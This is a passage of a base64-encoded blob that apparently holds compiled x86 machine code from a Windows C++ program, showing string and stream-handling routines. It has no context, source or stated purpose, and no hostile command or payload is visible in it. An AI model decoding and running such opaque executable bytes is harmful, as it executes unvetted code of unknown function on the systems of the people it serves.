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1N1FGLTcjHRfwEAAAA6HX4//9QaLAeQACNjSD////GRfwF/xXckEAAUOgp4P//g8QIg33oEMZF/ARyDItV1FLoITYAAIPEBI1FzFCNjRD/////FdiQQACLVhSD+hByBIsO6wKLzotGEAPBg/oQcgSLDusCi847w3UEM8DrAivBi03MUWoBUIvO6Kry//+LlRD///+LQgTHhAUQ////DJNAAMdF/AYAAADHhSj///+MkkAA9oVo////AcZF/Ad0EYuNOP///4sBUOiYNQAAg8QEU1NTjY0o/////xXMkEAAi5U8////iRqLhUz///+JGIuNXP///4kZg6Vo/////o2NKP///4mdZP///8ZF/Ab/FXSQQACNjSj///+IXfz/FayQQACNjXD/////FcCQQABHO33ED4JB/v//i8aLTfRkiQ0AAAAAWV9bi03wM83o+DQAAIvlXcPMVYvsav9o6X1AAGShAAAAAFCB7GAEAAChsMJAADPFiUXsU1ZXUI1F9GSjAAAAAIll8ItNKImNlPv//zPbU2g6k0AAiV386DbY//++DwAAAIm15Pv//4md4Pv//4id0Pv//4tNHItFCL8QAAAAxkX8AjvPcwONRQgDRRg7z4tNCHMDjU0Ii5WU+///UlBRjY20+///ibXI+///iZ3E+///iJ20+///6Lb1///GRfwDOF0kdA2Nhez7//9QU1NqI+sLjY3s+///UVNTahpT/xUckkAAjYXs+///ibWs+///iZ2o+///iJ2Y+///jVABjUkAighAOst1+SvCUI2V7Pv//1KNjZj7///odNf//42FmPv//1CNjdD7///GRfwE6B76///GRfwDOb2s+///cg+LjZj7//9R6NQzAACDxARqAWg4k0AAjY3Q+///6HHv//+LhdD7//85veT7//9zBo2F0Pv//4s1XJFAAFD/1oPEBGoCaDSTQACNjdD7///oP+///2oCaDCTQACNjdD7///oLe///2oCaCyTQACNjdD7///oG+///2oDaCiTQACNjdD7///oCe///2oBaDiTQACNjdD7///o9+7//4uF0Pv//zm95Pv//3MGjYXQ+///UP/Wg8QEav9TjZW0+///Uo2N0Pv//+jY7f//agFoOJNAAI2N0Pv//+i27v//i4XQ+///Ob3k+///cwaNhdD7//9Q/9aDxARq/1ONhbT7//9QjY3Q+///6Jft//9qBGggk0AAjY3Q+///6HXu//85vcj7//9yD4uNtPv//1HorzIAAIPEBIuNlPv//2r/U42V0Pv//1LHRfwBAAAA6BLV//85veT7//9yD4uF0Pv//1DofDIAAIPEBMeF5Pv//w8AAACJneD7//+IndD7//85fRxyDItNCFHoVTIAAIPEBLAB6xu4hj9AAMONjdD7///oD9T//41NCOgH1P//MsCLTfRkiQ0AAAAAWV9eW4tN7DPN6AAyAACL5V3DzMzMzMzMzMzMVYvsav9ob35AAGShAAAAAFCB7NQAAAChsMJAADPFiUXsU1ZXUI1F9GSjAAAAAIll8ItNCIt9EDPbi8GJvST////HRawPAAAAiV2oiF2YjXABihBAOtN1+SvGUFGNTZjoHNX//4tFDFCD7ByLzImlIP///2r/iB+IXx6IX0CIX0qIX2iJXzxTjVWYiV38x0EUDwAAAIlZEFLGRfwBiBno7dP//+g4IgAAg8QgOsN1GYN9rBByDItFmFDoUDEAAIPEBDLA6RkEAABqAVNoPJNAAI1NmOhY5P//i/BqAY1OAVFoPJNAAI1NmOhD5P//i/hqAY1XAVJoPJNAAI1NmOgu5P//iYUg////agFAUGg8k0AAjU2Y6Bfk//+D/v91AjP2g///dQIz/4uNIP///4P5/3UIM8mJjSD///+D+P91AjPAO/N1Gzv7dRc7y3UTO8N1D41NmOiH0v//MsDpgQMAAFZTjYUo////UI1NmOi/8v//g708////EIuVKP///8ZF/AJzBo2VKP///4uNJP///4PBSooCiAFCQTrDdfaLzyvOSVFGVo2VYP///1KNTZjofPL//4O9dP///xCLlWD////GRfwDcwaNlWD///+LjST///+KAogBQkE6w3X2i7Ug////i8Yrx0hQR1eNjXz///9RjU2Y6Dby//+DfZAQi5V8////xkX8BHMGjZV8////i70k////jU8ejaQkAAAAAIoCiAFCQTrDdfaLVahSRlaNRdBQjU2Y6PTx//+LVdC+EAAAAMZF/AU5deRzA41V0I1PaIoCiAFCQTrDdfaLTeCDwfFRag+NVbRSjU3Q6L7x//+LVbTGRfwGOXXIcwONVbSNT0CKAogBQkE6w3X2i0XEg8D9UGoDjY1E////UY1NtOiK8f//OXAUcgKLAFD/FfyRQACDxASJRzw5tVj///9yD4uVRP///1LoQC8AAIPEBGoDU42FRP///1CNTbToTfH//4vwjU20O850XL8QAAAAOX3IcgyLVbRS6A8vAACDxATHRcgPAAAAiV3EiF20OX4UcxWLRhBAUI1FtFZQ/xUAkkAAg8QM6weLDolNtIkei1YQiVXEi0YUiUXIx0YUDwAAAIleEIgevhAAAADGRfwGObVY////cg+LjUT///9R6KkuAACDxASLVbQ5dchzA41VtIu9JP///41PQI1kJACKAogBQkE6w3X2ag9TjZVE////Uo1N0OiU8P//i/CNRdA7xnRZg33kEHIMi03QUehaLgAAg8QEx0XkDwAAAIld4Ihd0IN+FBBzFYtWEEJSjUXQVlD/FQCSQACDxAzrB4sOiU3QiR6LVhC